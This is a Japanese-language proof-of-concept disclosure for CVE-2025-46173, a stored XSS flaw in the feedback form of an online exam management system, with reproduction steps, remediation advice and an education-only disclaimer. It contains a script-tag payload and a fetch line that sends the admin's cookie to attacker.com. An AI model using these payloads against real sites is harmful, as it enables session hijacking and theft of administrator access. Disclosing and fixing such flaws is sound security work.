
CVE-2025-46173のPoC
CVE-2025-46173 は、code-projects の Online Exam Mastering System 1.0 で発見された 格納型クロスサイトスクリプティング (XSS) 脆弱性です。この脆弱性は feedback.php コンポーネントに存在し、名前フィールド へのユーザー入力が適切にサニタイズされないため、悪意のある攻撃者が任意の JavaScript を注入できるようになります。管理者が管理ダッシュボード (dash.php) でこのフィードバックを表示すると、ペイロードが管理者のブラウザで実行され、セッションハイジャックや権限昇格の可能性が生じます。
feedback.php, dash.phpユーザーがフィードバックフォームの 名前 フィールドに以下のペイロードを送信します:
<script>alert(document.cookie)</script>

管理者が後で dash.php で送信されたフィードバックを表示すると、ペイロードが実行されます:

管理者のセッションクッキーが document.cookie を通じて公開され、外部に送信される可能性があります:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
脆弱なバージョンを code-projects からクローンまたはセットアップします。
localhost/exam/feedback.php に移動します。
「名前」フィールドに以下を入力します:
<script>alert(document.cookie)</script>
フォームを送信します。
管理者としてログインし、dash.php?q=3 にアクセスしてフィードバックを表示します。
スクリプトが管理者のコンテキストで実行されます。
悪用に成功すると、リモート攻撃者は以下が可能になります:
&, <, >, ")をエスケープして ユーザー入力をサニタイズ します。htmlspecialchars() のような堅牢なサニタイズライブラリ、またはフロントエンド検証とバックエンドサニタイズの組み合わせを使用します。Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
スクリーンショットは教育目的のみです。すべてのテストはローカル環境で行われました。
この情報は教育および研究目的のみで提供されています。自分が所有していないシステムやテストする明示的な許可がないシステムで使用しないでください。